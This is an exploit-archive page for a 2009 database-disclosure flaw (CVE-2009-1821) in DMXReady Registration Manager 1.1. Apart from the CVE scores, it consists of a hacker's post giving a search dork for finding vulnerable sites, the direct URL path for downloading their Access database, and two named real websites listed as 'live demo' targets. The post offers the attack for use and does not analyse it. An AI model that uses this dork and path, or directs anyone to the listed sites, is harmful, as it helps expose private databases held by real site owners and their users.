DMXReady Registration Manager 1.1 Database Disclosure Vulnerability

2009.06.01

Credit: S4S-T3rr0r!sT

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-1821

CWE: CWE-264

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

************************************************** *****************************
# Title : DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability
# Author : S4S-T3rr0r!sT
# Contact : l3t@hotmail.com / S4S@n2m3.com
# S.Page : DMXReady CMS Plugin Applications Web Site Design Extensions Dreamweaver ASP Template Database Driven
# Site : WwW.s3curi7y.com / www.h-t.cc
************************************************** *****************************
D0rk : "inurl:inc_webblogmanager.asp"
Exploit :
# http://[target].com/[path]/databases/webblogmanager.mdb
l!ve D3mo :
# http://74.200.213.93/databases/webblogmanager.mdb
# http://www.nomorewar.com/databases/webblogmanager.mdb
V1V4 GaZa
./Done
Thanx To : Cold-Z3ro , HcJ , ViRuSMaN , AlQaYsAr , zAx , Cyb3r-Err0r ,Arabic S3curi7y crew Members, all arabian hacker

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

DMXReady Registration Manager 1.1 Database Disclosure Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.